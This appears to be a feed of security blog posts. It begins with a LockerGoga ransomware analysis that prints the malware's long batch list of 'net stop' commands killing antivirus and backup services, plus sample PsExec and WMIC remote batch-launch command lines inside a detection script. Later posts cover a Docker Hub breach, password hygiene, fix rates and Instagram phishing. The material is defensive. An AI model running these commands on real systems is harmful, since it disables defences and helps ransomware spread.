The batch file above attempts to kill several AV products and disable security tools. At the end of the script, the malware copy on the remote machine is executed from c:\windows\temp\taskhost.exe.

Due to the presence of these batch files and the fact that the malware binary makes no direct reference to them, we believe that the spreading mechanism is executed manually by an attacker or via an unknown binary. The path, username, and passwords are hardcoded in the scripts, which indicates the attacker had previous knowledge of the environment.

The following is a list of all the processes and services disabled by the malware. One batch file found on infected systems where LockerGoga was executed stops critical system services and security software:

net stop BackupExecAgentAccelerator /y net stop McAfeeEngineService /y
net stop BackupExecAgentBrowser /y net stop McAfeeFramework /y
net stop BackupExecDeviceMediaService /y net stop McAfeeFrameworkMcAfeeFramework /y
net stop BackupExecJobEngine /y net stop McTaskManager /y
net stop BackupExecManagementService /y net stop mfemms /y
net stop BackupExecRPCService /y net stop mfevtp /y
net stop BackupExecVSSProvider /y net stop MMS /y
net stop bedbg /y net stop mozyprobackup /y
net stop DCAgent /y net stop MsDtsServer /y
net stop EPSecurityService /y net stop MsDtsServer100 /y
net stop EPUpdateService /y net stop MsDtsServer110 /y
net stop EraserSvc11710 /y net stop MSExchangeES /y
net stop EsgShKernel /y net stop MSExchangeIS /y
net stop FA_Scheduler /y net stop MSExchangeMGMT /y
net stop IISAdmin /y net stop MSExchangeMTA /y
net stop IMAP4Svc /y net stop MSExchangeSA /y
net stop macmnsvc /y net stop MSExchangeSRS /y
net stop masvc /y net stop MSOLAP$SQL_2008 /y
net stop MBAMService /y net stop MSOLAP$SYSTEM_BGC /y
net stop MBEndpointAgent /y net stop MSOLAP$TPS /y
net stop McShield /y net stop MSSQLFDLauncher$TPS /y
net stop MSOLAP$TPSAMA /y net stop MSSQLFDLauncher$TPSAMA /y
net stop MSSQL$BKUPEXEC /y net stop MSSQLSERVER /y
net stop MSSQL$ECWDB2 /y net stop MSSQLServerADHelper100 /y
net stop MSSQL$PRACTICEMGT /y net stop MSSQLServerOLAPService /y
net stop MSSQL$PRACTTICEBGC /y net stop MySQL57 /y
net stop MSSQL$PROFXENGAGEMENT /y net stop ntrtscan /y
net stop MSSQL$SBSMONITORING /y net stop OracleClientCache80 /y
net stop MSSQL$SHAREPOINT /y net stop PDVFSService /y
net stop MSSQL$SQL_2008 /y net stop POP3Svc /y
net stop MSSQL$SYSTEM_BGC /y net stop ReportServer /y
net stop MSSQL$TPS /y net stop ReportServer$SQL_2008 /y
net stop MSSQL$TPSAMA /y net stop ReportServer$SYSTEM_BGC /y
net stop MSSQL$VEEAMSQL2008R2 /y net stop ReportServer$TPS /y
net stop MSSQL$VEEAMSQL2012 /y net stop ReportServer$TPSAMA /y
net stop MSSQLFDLauncher /y net stop RESvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y net stop sacsvr /y
net stop MSSQLFDLauncher$SBSMONITORING /y net stop MSSQLFDLauncher$SHAREPOINT /y net stop SamSs /y
net stop MSSQLFDLauncher$SQL_2008 /y net stop SAVAdminService /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y net stop SAVService /y
net stop MSOLAP$TPSAMA /y net stop MSSQLFDLauncher$TPS /y
net stop MSSQL$BKUPEXEC /y net stop MSSQLFDLauncher$TPSAMA /y
net stop SDRSVC /y net stop SQLSafeOLRService /y
net stop SepMasterService /y net stop SQLSERVERAGENT /y
net stop ShMonitor /y net stop SQLTELEMETRY /y
net stop Smcinst /y net stop SQLTELEMETRY$ECWDB2 /y
net stop SmcService /y net stop SQLWriter /y
net stop SMTPSvc /y net stop SstpSvc /y
net stop SNAC /y net stop svcGenericHost /y
net stop SntpService /y net stop swi_filter /y
net stop sophossps /y net stop swi_service /y
net stop SQLAgent$BKUPEXEC /y net stop swi_update_64 /y
net stop SQLAgent$ECWDB2 /y net stop TmCCSF /y
net stop SQLAgent$PRACTTICEBGC /y net stop tmlisten /y
net stop SQLAgent$PRACTTICEMGT /y net stop TrueKey /y
net stop SQLAgent$PROFXENGAGEMENT /y net stop TrueKeyScheduler /y
net stop SQLAgent$SBSMONITORING /y net stop TrueKeyServiceHelper /y
net stop SQLAgent$SHAREPOINT /y net stop SQLAgent$SQL_2008 /y net stop UI0Detect /y
net stop SQLAgent$SYSTEM_BGC /y net stop SQLAgent$TPS /y net stop VeeamBackupSvc /y
net stop SQLAgent$TPSAMA /y net stop VeeamBrokerSvc /y
net stop SQLAgent$VEEAMSQL2008R2 /y net stop SQLAgent$VEEAMSQL2012 /y net stop VeeamCatalogSvc /y
net stop SQLBrowser /y net stop VeeamCloudSvc /y
net stop SDRSVC /y net stop SQLSafeOLRService /y
net stop SepMasterService /y net stop SQLSERVERAGENT /y
net stop ShMonitor /y net stop SQLTELEMETRY /y
net stop VeeamDeploymentService /y net stop NetMsmqActivator /y
net stop VeeamDeploySvc /y net stop EhttpSrv /y
net stop VeeamEnterpriseManagerSvc /y net stop ekrn /y
net stop VeeamMountSvc /y net stop ESHASRV /y
net stop VeeamNFSSvc /y net stop MSSQL$SOPHOS /y
net stop VeeamRESTSvc /y net stop SQLAgent$SOPHOS /y
net stop VeeamTransportSvc /y net stop AVP /y
net stop W3Svc /y net stop klnagent /y
net stop wbengine /y net stop MSSQL$SQLEXPRESS /y
net stop WRSVC /y net stop SQLAgent$SQLEXPRESS /y net stop wbengine /y
net stop MSSQL$VEEAMSQL2008R2 /y net stop kavfsslp /y
net stop SQLAgent$VEEAMSQL2008R2 /y net stop VeeamHvIntegrationSvc /y net stop KAVFSGT /y
net stop swi_update /y net stop KAVFS /y
net stop SQLAgent$CXDB /y net stop mfefire /y
net stop SQLAgent$CITRIX_METAFRAME /y net stop “SQL Backups” /y net stop “avast! Antivirus” /y
net stop MSSQL$PROD /y net stop aswBcc /y
net stop “Zoolz 2 Service” /y net stop “Avast Business Console Client Antivirus Service” /y
net stop MSSQLServerADHelper /y net stop mfewc /y
net stop SQLAgent$PROD /y net stop Telemetryserver /y
net stop msftesql$PROD /y net stop WdNisSvc /y
net stop WinDefend /y net stop EPUpdateService /y
net stop MCAFEETOMCATSRV530 /y net stop TmPfw /y
net stop MCAFEEEVENTPARSERSRV /y net stop SentinelAgent /y
net stop MSSQLFDLauncher$ITRIS /y net stop SentinelHelperService /y
net stop MSSQL$EPOSERVER /y net stop LogProcessorService /y
net stop MSSQL$ITRIS /y net stop EPUpdateService /y
net stop SQLAgent$EPOSERVER /y net stop TmPfw /y
net stop SQLAgent$ITRIS /y net stop SentinelAgent /y
net stop SQLTELEMETRY$ITRIS /y net stop SentinelHelperService /y
net stop MsDtsServer130 /y net stop LogProcessorService /y
net stop SSISTELEMETRY130 /y net stop EPUpdateService /y
net stop MSSQLLaunchpad$ITRIS /y net stop TmPfw /y
net stop BITS /y net stop SentinelAgent /y
net stop BrokerInfrastructure /y net stop EPProtectedService /y
net stop epag /y net stop epredline /y
net stop EPIntegrationService /y net stop EPSecurityService /y
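As an added example that is not part of the original post, the following Python detection logic correlates the behaviors described above over constructed process-creation and file-creation events: PsExec or WMI launching a batch file from the temp folder, a burst of `net stop` commands spawned by one parent, and several sibling processes each writing .locked files under the same parent, the correlation the multi-process encryption design makes harder. The event shapes, pids, hosts, users and paths are assumptions, not telemetry from the investigation.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not from the original post), shaped like
# process-creation records (pid, ppid, command_line) and file-creation
# records (pid, path). Hosts, users and paths are placeholders.
PROCESS_EVENTS = [
    (200, 50, r'start psexec.exe \\10.0.0.7 -u corp\admin -p "pass" -d -h -r mstdc '
              r'-s accepteula -nobanner c:\windows\temp\xax.bat'),
    (201, 50, r'start wmic /node:"10.0.0.7" /user:"corp\admin" /password:"pass" '
              r'process call create "cmd /c c:\windows\temp\kill.bat"'),
    (300, 1, r'cmd /c c:\windows\temp\kill.bat'),
    (301, 300, 'net stop McShield /y'),
    (302, 300, 'net stop WinDefend /y'),
    (303, 300, 'net stop SepMasterService /y'),
    (304, 300, 'net stop "SQL Backups" /y'),
    (305, 300, 'net stop VeeamBackupSvc /y'),
    (400, 1, r'c:\windows\temp\taskhost.exe'),      # master process
    (401, 400, r'c:\windows\temp\taskhost.exe'),    # slave (encryption) processes
    (402, 400, r'c:\windows\temp\taskhost.exe'),
    (403, 400, r'c:\windows\temp\taskhost.exe'),
    (900, 1, 'net stop Spooler /y'),                # benign single stop, must not alert
]
FILE_EVENTS = [
    (401, r'C:\Users\alice\Documents\budget.xlsx.locked'),
    (402, r'C:\Users\alice\Documents\report.docx.locked'),
    (403, r'C:\Users\alice\Pictures\trip.jpg.locked'),
    (800, r'C:\Users\alice\Downloads\setup.tmp'),   # unrelated write
]

# Remote launch of a batch file via PsExec (with the EULA auto-accepted) or via
# WMI "process call create", as in the spreading commands shown in the post.
PSEXEC_RE = re.compile(r'\bpsexec(?:\.exe)?\s+\\\\\S+.*\baccepteula\b.*\.bat\b', re.I)
WMIC_RE = re.compile(r'\bwmic(?:\.exe)?\s+/node:.*\bprocess\s+call\s+create\b.*\.bat\b', re.I)
# "net stop <name> /y" with an optionally quoted service name.
NET_STOP_RE = re.compile(r'\bnet(?:\.exe)?\s+stop\s+(?:"([^"]+)"|(\S+))', re.I)


def detect_remote_batch_execution(process_events):
    """Return [(pid, tool)] for command lines that launch a .bat on a remote host."""
    hits = []
    for pid, _ppid, cmd in process_events:
        if PSEXEC_RE.search(cmd):
            hits.append((pid, "psexec"))
        elif WMIC_RE.search(cmd):
            hits.append((pid, "wmic"))
    return hits


def detect_service_stop_burst(process_events, threshold=5):
    """Map parent pid -> sorted service names when one parent spawns >= threshold net stops.

    A kill script like the one above produces hundreds of stops from a single
    cmd.exe parent; a lone "net stop" from an administrator stays below threshold.
    """
    stops = defaultdict(list)
    for _pid, ppid, cmd in process_events:
        m = NET_STOP_RE.search(cmd)
        if m:
            stops[ppid].append(m.group(1) or m.group(2))
    return {ppid: sorted(names) for ppid, names in stops.items() if len(names) >= threshold}


def detect_multiprocess_encryption(process_events, file_events, ext=".locked", min_children=3):
    """Map parent pid -> set of child pids when several siblings each create `ext` files.

    Each slave writes only a few files, so per-process thresholds miss it; the
    parent is the unit worth alerting on.
    """
    parent_of = {pid: ppid for pid, ppid, _cmd in process_events}
    writers = defaultdict(set)
    for pid, path in file_events:
        if path.lower().endswith(ext) and pid in parent_of:
            writers[parent_of[pid]].add(pid)
    return {ppid: pids for ppid, pids in writers.items() if len(pids) >= min_children}


def run_all(process_events=PROCESS_EVENTS, file_events=FILE_EVENTS):
    """Collect human-readable alerts from the three detections."""
    alerts = [f"remote batch execution via {tool} (pid {pid})"
              for pid, tool in detect_remote_batch_execution(process_events)]
    for ppid, names in detect_service_stop_burst(process_events).items():
        alerts.append(f"service-stop burst from pid {ppid}: {', '.join(names)}")
    for ppid, pids in detect_multiprocess_encryption(process_events, file_events).items():
        alerts.append(f"multi-process {'.locked'} writes under pid {ppid}: {sorted(pids)}")
    return alerts


if __name__ == "__main__":
    for line in run_all():
        print(line)
```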

New ransomware, new features, but still room to improve

We will continue tracking LockerGoga, but we have already seen some interesting features not seen before, such as parallel tasks encrypting the system or log files for debugging purposes. We did not see any spreading method used to deliver LockerGoga, so it would be fair to assume it is used in targeted campaigns after the attackers have gained access to the system. At the time of this analysis, none of the samples are packed or have complex methods of protection against being executed inside a sandbox system, though this could change in the near future.

Also, during the analysis, we observed LockerGoga encrypting legitimate DLLs, breaking the functionality of certain applications in the system, and also ciphering itself during the process, causing a crash:

We expect all these errors will be fixed with further development of the malware.

Observations:

The McAfee ATR team is observing how some new ransomware players in the cybersecurity field are reusing, or at least only making some minor modifications to, some features used by other ransomware families.

In the case of LockerGoga we can observe the following:

  • Sectigo-issued certificates used to digitally sign the samples
  • Ransom note slightly modified from Ryuk Ransomware
  • Specific FileMarker used to flag the encrypted files
  • No BTC address in the ransom note, meaning victims must make contact directly by email, something that we have seen elsewhere in our latest investigations.

MITRE ATT&CK Coverage:

Hooking

Kernel Modules and Extensions

Process Injection

Code Signing

Query Registry

Process Discovery

Data Compressed

McAfee coverage:

Detection names: 

RansomCLock-FAL!A5BC1F94E750

Ransom-Goga!E11502659F6B

Trojan-Ransom

Ransom-Goga!438EBEC995AD

Trojan-FQSS!3B200C8173A9

RansomCLock-FAL!A1D732AA27E1

Ransom-Goga!C2DA604A2A46

Ransom-O

Trojan-FPYT!BA53D8910EC3

Ransom-FQPT!FAF4DE4E1C5D

RansomCLock-FAL!3EBCA21B1D4E

RansomCLock-FAL!E8C7C902BCB2

Ransom-Goga!E11502659F6B

Generic.bvg

Ransom-Goga!16BCC3B7F32C

Expert Rules

The following expert rules can be used in Endpoint Security to block the malware from spreading. These rules are aggressive and may cause false positives, so make sure they are removed once the environment is cleaned:

Rule {
    Process {
        Include OBJECT_NAME { -v "SYSTEM:REMOTE" }
    }
    Target {
        Match FILE {
            Include OBJECT_NAME { -v "c:\\windows\\temp\\*.exe" }
            Include OBJECT_NAME { -v "c:\\windows\\temp\\*.bat" }
            Include -access "CREATE"
        }
    }
}

Rule {
    Process {
        Include OBJECT_NAME { -v "WmiPrvSE.exe" }
    }
    Target {
        Match PROCESS {
            Include OBJECT_NAME { -v "cmd.exe" }
            Include -access "CREATE"
        }
    }
}

Prescriptive guidance

It is advisable for customers to undertake an appropriate risk assessment to determine if this threat has a high probability of targeting their environments.  Whilst the known samples detailed above are covered by McAfee technologies, customers can also add the following Access Protection rules to prevent the creation of encrypted files on the victim host:

Executables:

  • Inclusion Status: Include
  • File Name or Path: *

SubRule:

  • Type: File
  • Operations: Create
  • Targets:
    • Target 1: Include, Files: *.locked
    • Target 2: Include, Destination file: *.locked

Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:

  • File/Folder Access Protection Rule, processes to include: *
  • File or folder name to block: *.locked
  • File actions to prevent: New files being created

Access Protection Rules:

Customers can also add Access Protection rules matching these characteristics: Prevent Creation\Execution of:

  • c:\windows\temp\x??.bat
  • c:\windows\temp\kill.bat
  • c:\windows\temp\taskhost.exe

Prevent execution of binaries signed with SN:

  • C=GB, PostalCode=DT3 4DD, S=WEYMOUTH, L=WEYMOUTH, STREET=16 Australia Road Chickerell, O=MIKL LIMITED, CN=MIKL LIMITED
  • C=GB, PostalCode=WC2H 9JQ, S=LONDON, L=LONDON, STREET=71-75 Shelton Street Covent Garden, O=ALISA LTD, CN=ALISA LTD
  • C=GB, PostalCode=EC1V 2NX, S=LONDON, L=LONDON, STREET=Kemp House 160 City Road, O=KITTY’S LTD, CN=KITTY’S LTD

YARA RULE

We have a YARA rule available on our ATR github repository:

IOCs

The post LockerGoga Ransomware Family Used in Targeted Attacks appeared first on McAfee Blogs.

Docker Hub Database Breached, As Many As 190,000 Accounts Affected

Docker, a company that created an open platform for building and running distributed applications, reported to users that its Docker Hub database had been breached, exposing sensitive data from approximately 190,000 accounts. While that figure makes up less than five percent of Hub users, the data included some usernames and hashed passwords as well as GitHub and Bitbucket tokens for Docker autobuild. The company reported that the tokens have been revoked, and said it “acted quickly to intervene and secure the site.”

Experts who spoke with Motherboard indicated that the worst-case scenario is that hackers gain access to proprietary source code of some of those accounts. For context, companies on Docker’s roster include the likes of Paypal and Visa. Microsoft quickly reported that its official files hosted in Docker Hub were not compromised.

According to Veracode CTO Chris Wysopal, it is not yet known what the underlying vulnerability was at Docker Hub, but it is a serious breach as attackers could use the access tokens to get at a company’s source code. It is unclear if the attackers would have write privileges, which would enable backdooring into the code. Wysopal said each customer that was notified should be resetting access tokens and looking at logs for access. With revision control, this is all heavily audited.

Since Docker notified customers quickly, hopefully the impact is limited. The company emailed those impacted by the breach directly with a password reset link. Customers using autobuilds should check to ensure that their GitHub or Bitbucket repositories are still linked to the Docker Hub to ensure autobuilds work correctly moving forward.

Thousands of companies and millions of developers around the world use Docker to run containers, which are software packages that include code, runtime, settings, system libraries, and system tools. By isolating software from its surroundings, software containers enable code to always run the same regardless of the environment it is operating within. Although the company is still investigating the breach, if hackers have access to the private code in the repositories, they may be able to inject malicious code into software autobuilt by Docker.

Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’

As adults, we know the importance of strong passwords, and we’ve likely preached the message to our kids. But let’s rewind for a minute. Do our kids understand why strong passwords are important and why it needs to become a habit much like personal health and hygiene?

If we want the habit to stick, the reason why can’t be simply because we told them so. We’ve got to make it personal and logical.

Think about the habits you’ve already successfully instilled and the reasoning you’ve attached to them.

Brush your teeth to prevent disease and so they don’t fall out.
Eat a balanced diet so you have fuel for the day and to protect yourself from illness and disease.
Get enough sleep to restore your body and keep your mind sharp for learning.
Bathe and groom to wash away germs (and to keep people from falling over when you walk by). 

The same reasoning applies to online hygiene: We change our passwords (about every three months) to stay as safe as possible online and protect what matters. When talking to kids, the things that matter include our home address, our school name, our personal information (such as a parent’s credit card information, our social security number, or other account access).

Kids Targeted

We falsely believe that an adult’s information is more valuable than a child’s. On the contrary, given a choice, 10 out of 10 hackers would mine a child’s information over an adult’s because it’s unblemished. Determined identity thieves will use a child’s Social Security number to apply for government benefits, open bank and credit card accounts, apply for a loan or utility service, or rent an apartment. Also, once a child’s information is hacked, a thief can usually get to a parent’s information.

How to Stay Safe

It’s a tall task to prevent some of the massive data breaches in the news that target kids’ information. However, what is in our control is the ability to practice and teach healthy password habits in our home.

Tips for Families

Shake it up. According to McAfee Chief Consumer Security Evangelist Gary Davis, to bulletproof your passwords, make sure they are at least 12 characters long and include numbers, symbols, and upper and lowercase letters. Consider substituting numbers and symbols for letters, such as zero for “O” or @ for “A”.

Encourage kids to get creative and create passwords or phrases that mean something to them. For instance, advises Gary, “If you love crime novels you might pick the phrase: ILoveBooksOnCrime
Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as 1L0VEBook$oNcRIM3!”

Three random words. Password wisdom has morphed over the years as we learn more and more about hacking practices. According to the National Cyber Security Centre, another way to create a strong password is by using three random words (not birthdates, addresses, or sports numbers) that mean something to you. For instance: ‘lovepuppypaws’ or ‘drakegagacardib’ or ‘eatsleeprepeat’ or ‘tacospizzanutella’.

More than one password. Creating a new password for each account will head off cybercriminals if any of your other passwords are cracked. Consider a password manager to help you keep track of your passwords.

Change product default passwords immediately. If you purchase products for kids such as internet-connected gaming devices, routers, or speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

When shopping online, don’t save info. Teach kids that when shopping on their favorite retail or gaming sites, not to save credit card information. Saving personal information to different accounts may speed up the checkout process. However, it also compromises data.

Employ extra protection. Comprehensive security software can protect you from several threats such as viruses, identity theft, privacy breaches, and malware designed to grab your data. Security software can cover your whole family as well as multiple devices.

Web Advisor. Keep your software up-to-date with a free web advisor that helps protect you from accidentally typing passwords into phishing sites.

Use unique passwords and MFA. This is also called “layering up.” 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if one is hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication). MFA confirms a user’s identity only after two or more pieces of evidence are presented. Though not 100% secure, this practice adds a layer of security to an account.

Keep it private. Kids love to show one another loyalty by sharing passwords and giving one another access to their social network accounts. DO NOT encourage this behavior. It’s reckless and could carry some serious privacy consequences. (Of course, sharing with parents is recommended.)

Credential Cracking

According to the Identity Theft Resource Center® (ITRC), the reported number of consumer records exposed containing sensitive personally identifiable information jumped 126 percent in 2018. The report explicitly stated password cracking as an issue: “The exploitation of usernames and passwords by nefarious actors continues to be a ripe target due to the increase in credential cracking activities – not to mention the amount of data that can be gleaned by accessing accounts that reuse the same credentials.”

May 2 is World Password Day and the perfect time to consider going over these password basics with your family.

The post Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’ appeared first on McAfee Blogs.

What Is Fix Rate, and Why Does It Matter?

Once your application security program is up and running, there are several metrics you can use to gauge your progress and optimize your program. For instance, companies typically measure their scan activity, flaw density, and policy compliance. However, very few include metrics for fix rate, despite the fact that it is an important indicator of a program’s success. Fix rate indicates how long it takes for a team to fix the vulnerabilities their scans find. Fix rate is calculated as follows:

Fix Rate = Fixed Flaws divided by (Fixed + Open Flaws)

Looking at fix rate over time measures the average velocity at which organizations are fixing flaws.
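As an added example that is not part of the original post, the fix-rate definition above and the fix-velocity curve measured from the day of first discovery, computed in Python over constructed findings (the discovery and closure dates are invented, not SoSS data). It also shows a detail the formula alone does not: flaws younger than a horizon have not had a chance to be fixed within it, so they must be left out of that point on the curve.

```python
from datetime import date

# Constructed sample findings (not SoSS data): (discovered, closed or None if open).
FINDINGS = [
    (date(2018, 1, 1), date(2018, 1, 4)),    # closed in 3 days
    (date(2018, 1, 1), date(2018, 1, 25)),   # 24 days
    (date(2018, 1, 1), date(2018, 3, 20)),   # 78 days
    (date(2018, 1, 1), None),                # still open
    (date(2018, 2, 1), date(2018, 2, 5)),    # 4 days
    (date(2018, 2, 1), date(2018, 4, 5)),    # 63 days
    (date(2018, 2, 1), None),
    (date(2018, 3, 10), date(2018, 3, 12)),  # 2 days
    (date(2018, 3, 10), None),
    (date(2018, 3, 25), None),               # only 16 days old on AS_OF
]
AS_OF = date(2018, 4, 10)  # assumed reporting date


def fix_rate(findings, as_of):
    """Fixed / (Fixed + Open), the definition given above, as of a reporting date."""
    fixed = sum(1 for _d, closed in findings if closed is not None and closed <= as_of)
    return fixed / len(findings) if findings else 0.0


def fix_velocity(findings, horizon_days, as_of):
    """Fraction of flaws closed within horizon_days of their discovery.

    Only flaws discovered at least horizon_days before as_of are eligible:
    a flaw found last week cannot yet have missed a 30-day window, and
    counting it as open would understate the velocity.
    Returns None when no flaw is old enough to judge.
    """
    eligible = [(d, c) for d, c in findings if (as_of - d).days >= horizon_days]
    if not eligible:
        return None
    closed_in_window = sum(
        1 for d, c in eligible
        if c is not None and c <= as_of and (c - d).days <= horizon_days
    )
    return closed_in_window / len(eligible)


def velocity_curve(findings, as_of, horizons=(7, 30, 90)):
    """Points of the fix-velocity curve at the given day horizons."""
    return {h: fix_velocity(findings, h, as_of) for h in horizons}


if __name__ == "__main__":
    print(f"overall fix rate: {fix_rate(FINDINGS, AS_OF):.0%}")
    for days, frac in velocity_curve(FINDINGS, AS_OF).items():
        print(f"closed within {days:>3} days: {frac:.0%}")
```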

All the metrics mentioned above are important, but fix rate is especially critical. Ultimately, the most important function of an application security program is effectively fixing flaws once they are discovered. In the end, you can’t scan your way to secure code.

What are the average fix rates?

For our most recent State of Software Security (SoSS) report, we analyzed the data compiled from the 700,000 scans we performed over a 12-month period between April 1, 2017 and March 31, 2018, and this reveals a pretty clear picture of the current state of fix rates.

When we look at the curve for the average fix velocity from the first day of discovery, we see that it takes organizations a troubling amount of time to address most of their flaws. One week after first discovery, organizations close out only about 15 percent of vulnerabilities. In the first month, that closure reaches just under 30 percent. By the three-month mark, organizations haven’t even made it halfway, closing only a little more than 45 percent of all flaws.

When we looked at fix rate by flaw type, we found that organizations are making a big push to fix their highest severity vulnerabilities first. Organizations managed to reach closure on 75 percent of these high-severity flaws more than 100 days sooner than the norm.

But the numbers aren’t so positive for other vulnerability rankings, such as exploitability or business criticality.

Why are fix rates important?

Speed matters when it comes to application security. The time it takes for attackers to come up with exploits for newly discovered vulnerabilities is measured in hours or days. Letting known vulnerabilities linger unfixed dramatically increases your risk. For instance, it was merely days between disclosure and exploitation of the vulnerability in the Apache Struts framework that led to the Equifax breach.

In addition, it’s important to address the most high-risk vulnerabilities the fastest. Our SoSS stats surrounding fix rate by flaw type (mentioned above) are important here. The fact that most organizations are solely focused on fixing high-severity flaws, but have troubling fix rates for flaws that are highly exploitable or business critical is problematic. Oftentimes, a low-severity flaw could be just as risky, if not more so, than a higher-severity flaw. For example, a low-severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit.

How can we improve our fix rate?

Here are some ways to give your fix rate a boost:

Prioritize more

Reconsider your application security policy to ensure you are taking steps to reduce your most high-risk vulnerabilities the fastest. The sheer volume of open flaws within enterprise applications is too staggering to tackle at once -- which means that organizations need to find effective ways to prioritize which flaws they fix first.

For instance, not all apps are created equal, so create different requirements for different apps. An application that has IP, is public facing, and has third-party components may require all medium to very critical flaws to be fixed. A one-page temporary marketing site may only require high/very high flaws to be fixed.

In addition, consider a flaw’s exploitability, not just its severity. As noted above, some low-severity flaws could be highly exploitable, while some high-severity flaws would never be exploitable.

Scan more

This year’s State of Software Security report also revealed that those organizations that scan most frequently have the highest fix rates. Our data shows that there is a very strong correlation between how many times a year an organization scans and how quickly they address their vulnerabilities.

When apps are tested fewer than three times a year, flaws persist more than 3.5x longer than when organizations can bump that up to seven to 12 scans annually. Each step up in scan rate results in shorter and shorter flaw persistence intervals. Once organizations are scanning more than 300 times per year, they’re able to shorten flaw persistence 11.5x across the intervals compared to applications that are only scanned one to three times per year.

Prevent more

The fewer flaws you have to tackle, the faster you can tackle them. If developers have the secure coding skills needed to avoid introducing flaws in the first place, they will put a big dent in the work needed to fix flaws later in the cycle. But most developers have had zero training on secure coding – either in school or on the job. Our research has shown that when developers do get training or coaching on secure coding, the organization’s fix rate gets a big boost. When our customers offer eLearning on secure coding for their development team, they improve their fix rate by 19 percent. When they take advantage of remediation coaching, they improve it by a whopping 88 percent.

Learn more

There’s more to AppSec than scanning. Get details in our new eBook, Application Security: Beyond Scanning.

Something’s Phishy With the Instagram “HotList”

Phishing scams have become incredibly popular these days. Cybercriminals have upped the ante with their tactics, making their phishing messages almost identical to the companies they attempt to spoof. We’ve all heard about phishing emails, SMiShing, and voice phishing, but cybercriminals are turning to social media for their schemes as well. Last week, the “Nasty List” phishing scam plagued Instagram users everywhere, leading victims to fake login pages as a means to steal their credentials. Now, cybercriminals are capitalizing on the success of the “Nasty List” campaign with a new Instagram phishing scam called “The HotList.”

This scam markets itself as a collection of pictures ranked according to attractiveness. Similar to the “Nasty List,” this scheme sends messages to victims through hacked accounts saying that the user has been spotted on this so-called “hot list.” The messages claim to have seen the recipient’s images on the profile @The_HotList_95. If the user goes to the profile and clicks the link in the bio, they are presented with what appears to be a legitimate Instagram login page. Users are tricked into entering their login credentials on the fake login pages, whose URL typically ends in .me domains. Once the cybercriminals acquire the victim’s login, they are able to use their account to further spread the campaign.

Images courtesy of Bleeping Computer. 

Luckily, there are steps users can take to help ensure that their Instagram account stays secure:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. And if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common indicators of a potential scam at play.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in .me.
  • Reset your password. If your account was hacked by “The HotList” but you still have access to your account, reset your password to regain control of your page.
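The “inspect the URL before you click” advice can be made mechanical. The following Python helper is an added example, not code from the original post: it extracts the host from a link the way a browser resolves it and flags any login URL whose registered domain is not instagram.com, so the .me lookalikes used by this scam are caught; the allowlist and every sample URL are constructed for illustration.

```python
"""Flag login links whose host is not the service they claim to be.

Added example, not from the original post. It applies the "inspect the URL
before you click" advice: the host is taken from the URL the way a browser
resolves it, so tricks such as instagram.com@evil.me (userinfo) and
instagram.com.evil.me (subdomain) are not mistaken for the real site.
The allowlist and all sample URLs below are constructed for illustration.
"""
from typing import Optional
from urllib.parse import urlsplit

# Registered domains that legitimately host the Instagram login page.
# Constructed allowlist for the example; extend it for other services.
LEGIT_LOGIN_DOMAINS = {"instagram.com"}


def registered_domain(url: str) -> Optional[str]:
    """Return the host's last two labels in lower case, or None.

    None is returned for non-http(s) schemes (e.g. javascript:) and for
    URLs without a usable host. The two-label rule is enough for a .com
    allowlist; multi-label public suffixes (co.uk) would need the
    Public Suffix List.
    """
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https"):
        return None
    host = parts.hostname  # userinfo before '@' and any port are stripped
    if not host:
        return None
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2 or not all(labels):
        return None
    return ".".join(labels[-2:])


def looks_like_phish(url: str) -> bool:
    """True when the link does not land on an allowlisted login domain."""
    return registered_domain(url) not in LEGIT_LOGIN_DOMAINS


def triage(urls):
    """Return {url: verdict} for a batch of links found in messages."""
    return {u: ("PHISH" if looks_like_phish(u) else "ok") for u in urls}


if __name__ == "__main__":
    # Constructed samples: one genuine login link and several lookalikes.
    samples = [
        "https://www.instagram.com/accounts/login/",
        "https://instagram.com.login-check.me/",      # subdomain trick
        "https://instagram.com@login-check.me/",      # userinfo trick
        "https://instagram-verify.me/hotlist",        # different domain
        "javascript:void(0)",                         # no host at all
    ]
    for url, verdict in triage(samples).items():
        print(f"{verdict:5} {url}")
```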

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Something’s Phishy With the Instagram “HotList” appeared first on McAfee Blogs.

The Cybersecurity Dangers of the Dark Web and How to Protect Your Organization

Even as its top marketplace, Dream Market, prepares to close its doors, the dark web continues to thrive. In fact, Darkode, one of the most well-known hacking forums and black markets, has recently reopened. And what are some of the most common wares at these underground markets? Organizational data, and the tools needed to get more. As long as the dark web exists, organizations must learn more about the threat they pose, and how to protect themselves.

A One Stop Shop for Cyber Attack Tools

There are any number of ways attackers can use the dark web to find what they need to attack an organization. One of the most common items is ransomware, which has become worryingly affordable. For less than $1000, anyone can buy a malware strain that can be used again and again. While individuals are frequently ransomed, organizations are naturally a much more lucrative target. In fact, ransoms for organizations are rapidly increasing, with the average payment per incident going from around $7,000 in the final quarter of 2018 to almost $13,000 in the first quarter of 2019. 

